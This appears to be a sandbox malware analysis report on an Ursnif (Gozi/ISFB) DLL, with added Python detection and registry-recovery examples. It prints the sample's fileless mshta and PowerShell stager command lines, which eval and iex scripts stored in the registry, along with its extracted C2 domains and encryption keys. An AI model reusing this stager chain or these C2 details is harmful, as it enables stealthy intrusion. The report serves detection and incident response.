
Windows Analysis Report lj3H69Z3Io.dll

Overview

General Information

Sample Name: lj3H69Z3Io.dll
Analysis ID: 447090
MD5: 0bb29556ece1c51c751cb4e7c8752ddc
SHA1: 324cc356a56c68e51f09348e91405001e68e4a08
SHA256: af1b052362469a67fcd871558b24efa2be44a4b29f88112e5c2d2295a1dc4252
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Yara detected Ursnif
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3296 cmdline: loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 2696 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1304 cmdline: rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3416 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 64 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1808 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5964 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5796 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 996 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2592 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6132 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
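The mshta.exe and powershell.exe entries at the bottom of the tree are the part of this run that never touches disk: a hidden HTA (resizeTo(0,2)) reads a script out of the DeviceFile value under HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 with WScript.Shell.RegRead and eval()s it, and that script starts PowerShell, which reads the UtilTool value of the same key as bytes, converts them with [System.Text.Encoding]::ASCII.GetString and hands the text to iex. These are the command lines the Sigma hits in the Sigma Overview fire on. The following Python is an added example, not code from the Joe Sandbox report, that runs the same checks over process-creation records: the two command lines are copied from the tree, the field names follow Sysmon Event ID 1, the rule names are ours, the parent of mshta.exe (not shown in the tree) is assumed to be explorer.exe, and the third event is a constructed benign control.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation record; field names follow Sysmon Event ID 1."""
    pid: int
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str = ""


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
POWERSHELLS = {"powershell.exe", "pwsh.exe"}

IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# Get-ItemProperty / gp against an HKCU:\ or HKLM:\ path (PowerShell registry provider)
REG_GP_RE = re.compile(r"""\b(gp|get-itemproperty)\b\s+['"]?HK(CU|LM)[:\\]""", re.I)
# bytes-to-text conversion whose output feeds iex
DECODE_RE = re.compile(r"\[System\.Text\.Encoding\]::\w+\.GetString|FromBase64String", re.I)


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_spawning_shell(ev: ProcEvent) -> bool:
    """Sigma 'MSHTA Spawning Windows Shell': parent is mshta.exe, child is a shell."""
    return _basename(ev.parent_image) == "mshta.exe" and _basename(ev.image) in SHELLS


def encoded_iex(ev: ProcEvent) -> bool:
    """Sigma 'Encoded IEX': PowerShell evaluating text it first has to decode."""
    return (_basename(ev.image) in POWERSHELLS
            and bool(IEX_RE.search(ev.command_line))
            and bool(DECODE_RE.search(ev.command_line)))


def powershell_iex_from_registry(ev: ProcEvent) -> bool:
    """Our stricter variant: the text handed to iex is read straight from a registry value."""
    return (_basename(ev.image) in POWERSHELLS
            and bool(IEX_RE.search(ev.command_line))
            and bool(REG_GP_RE.search(ev.command_line)))


def hta_registry_stager(ev: ProcEvent) -> bool:
    """Inline 'about:' HTA that pulls script text out of the registry and eval()s it."""
    cl = ev.command_line.lower()
    return (_basename(ev.image) == "mshta.exe" and "about:" in cl
            and "regread(" in cl and "eval(" in cl)


RULES = {
    "mshta_spawning_shell": mshta_spawning_shell,
    "encoded_iex": encoded_iex,
    "powershell_iex_from_registry": powershell_iex_from_registry,
    "hta_registry_stager": hta_registry_stager,
}


def evaluate(events):
    """Return {pid: sorted rule names} for every event that triggers at least one rule."""
    hits = {}
    for ev in events:
        fired = sorted(name for name, rule in RULES.items() if rule(ev))
        if fired:
            hits[ev.pid] = fired
    return hits


# Constructed events: the first two command lines are copied from the process tree
# (mshta's parent is an assumption); the third is a benign control.
EVENTS = [
    ProcEvent(
        pid=6132, image=r"C:\Windows\System32\mshta.exe",
        command_line=r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'",
        parent_image=r"C:\Windows\explorer.exe"),
    ProcEvent(
        pid=5004, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))",
        parent_image=r"C:\Windows\System32\mshta.exe"),
    ProcEvent(
        pid=9999, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
        parent_image=r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for pid, rules in evaluate(EVENTS).items():
        print(pid, ", ".join(rules))
```

The parent/child check alone already catches PID 5004; the registry variant is what separates this stager from the many benign encoded-command launches, because a legitimate script has no reason to fetch its own body from an AppDataLow key.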

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "RS1bISYM3RiUEB+kp8sXk6GKaUSJTMdHLJSpyFRYeZm6NlcBwtjx2F3paluhib1HCWprL2CGUSXu41FZM2nRjuIHp5Tc3Qvf1bHq8axt1kKB98ZnmfPh2SiQVpHGVA+TOuAe97sVP0cE6xXX2ilAxOJC4Rf34gUi3XolV8kPrfJCHChbu9w1+s7rrVZTOVjBW+TY1D3deVJlDZHvhlBuumQis3pP1XsoLa3Qay006/AhbN9RIoAAij7c7SagXOd4BXA8L9GZCI5rXohvITy2kTk5pHs5LCiTFpT9Pohv1JBotMkOGx7WyBP+G1Cbx4yBjRbbIosmagFN4Hgw4QhKyFdWlAfAWJCgEYrSkeFoNBM=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "B43ovnLWYCtQUCWU", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security

Unpacked PEs

Source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004
Sigma detected: Mshta Spawning Windows Shell
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004
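All four Sigma hits describe a single fileless chain whose payload lives in the registry: the HTA reads the DeviceFile value of HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 and eval()s it, and the PowerShell it starts reads the UtilTool value of the same key as bytes and iex's the ASCII text. Those values are what rundll32.exe wrote through WMI StdRegProv (SetBinaryValue / SetStringValue under "Writes registry values via WMI" further down). During response you want the stored scripts out of that key without executing them. The Python below is an added example, not Joe Sandbox tooling: it parses a `reg export` of the key taken from a compromised host and returns the values as text, mirroring the PowerShell stage's ASCII.GetString step offline. The key path is the one from this report; the value contents in the sample export are constructed placeholders, since the real stage is not on this page.

```python
import re

# Key path copied from the report.
URSNIF_KEY = (r"HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft"
              r"\86EC23E5-2D5A-A875-E71A-B15C0BEE7550")

# Constructed stand-in for `reg export "<key>" key.reg`: the value names match the
# report, the contents are harmless placeholders (UtilTool decodes to
# "Write-Output 'stage placeholder'"), not the real Ursnif stage.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550]
"DeviceFile"="var s=\"placeholder\";window.flag=1;"
"UtilTool"=hex:57,72,69,74,65,2d,4f,75,74,70,75,74,20,27,73,74,61,67,65,20,\
  70,6c,61,63,65,68,6f,6c,64,65,72,27
"Client"=dword:00000001
'''

# Ursnif-style key: AppDataLow\Software\Microsoft\<GUID without braces>
GUID_KEY_RE = re.compile(
    r"\\Software\\AppDataLow\\Software\\Microsoft\\[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}$",
    re.I)
_NAME_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s: str) -> str:
    # .reg string syntax escapes '"' and '\' with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def _decode_value(raw: str):
    if raw.startswith("hex:"):                       # REG_BINARY
        return bytes.fromhex(raw[4:].replace(",", ""))
    if raw.startswith("hex("):                       # typed binary, e.g. hex(2): REG_EXPAND_SZ
        return bytes.fromhex(raw.split(":", 1)[1].replace(",", ""))
    if raw.startswith("dword:"):                     # REG_DWORD, hex digits
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':   # REG_SZ
        return _unescape(raw[1:-1])
    return raw


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: decoded_value}} for a Windows .reg export."""
    # A hex value that ends in ",\" continues on the next line; fold those first.
    text = re.sub(r",\\\r?\n[ \t]*", ",", text)
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _NAME_VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = _decode_value(m.group(2))
    return keys


def find_ursnif_keys(keys: dict) -> list:
    return [k for k in keys if GUID_KEY_RE.search(k)]


def recover_stage(text: str, value_name: str, encoding: str = "ascii") -> dict:
    """Offline equivalent of [System.Text.Encoding]::ASCII.GetString((gp <key>).<value>):
    the stored script as text for every Ursnif-style key in the export, never executed."""
    parsed = parse_reg_export(text)
    out = {}
    for key in find_ursnif_keys(parsed):
        v = parsed[key].get(value_name)
        if isinstance(v, bytes):
            out[key] = v.decode(encoding, errors="replace")
        elif isinstance(v, str):
            out[key] = v
    return out


if __name__ == "__main__":
    for name in ("DeviceFile", "UtilTool"):
        for key, script in recover_stage(SAMPLE_REG, name).items():
            print(f"{key}\\{name}: {script}")
```

Run it against a real export and you get the HTA body and the PowerShell stage as text for static review; the same parser, pointed at an export of the whole AppDataLow\Software\Microsoft branch, lists every GUID-named key the bot created, which is the set you need to delete during cleanup.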

              Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000003.00000003.351054723.00000000027A0000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "RS1bISYM3RiUEB+kp8sXk6GKaUSJTMdHLJSpyFRYeZm6NlcBwtjx2F3paluhib1HCWprL2CGUSXu41FZM2nRjuIHp5Tc3Qvf1bHq8axt1kKB98ZnmfPh2SiQVpHGVA+TOuAe97sVP0cE6xXX2ilAxOJC4Rf34gUi3XolV8kPrfJCHChbu9w1+s7rrVZTOVjBW+TY1D3deVJlDZHvhlBuumQis3pP1XsoLa3Qay006/AhbN9RIoAAij7c7SagXOd4BXA8L9GZCI5rXohvITy2kTk5pHs5LCiTFpT9Pohv1JBotMkOGx7WyBP+G1Cbx4yBjRbbIosmagFN4Hgw4QhKyFdWlAfAWJCgEYrSkeFoNBM=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "B43ovnLWYCtQUCWU", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com, Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: lj3H69Z3Io.dll, Virustotal: Detection: 41%
Source: lj3H69Z3Io.dll, ReversingLabs: Detection: 31%
Source: lj3H69Z3Io.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: lj3H69Z3Io.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
              Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
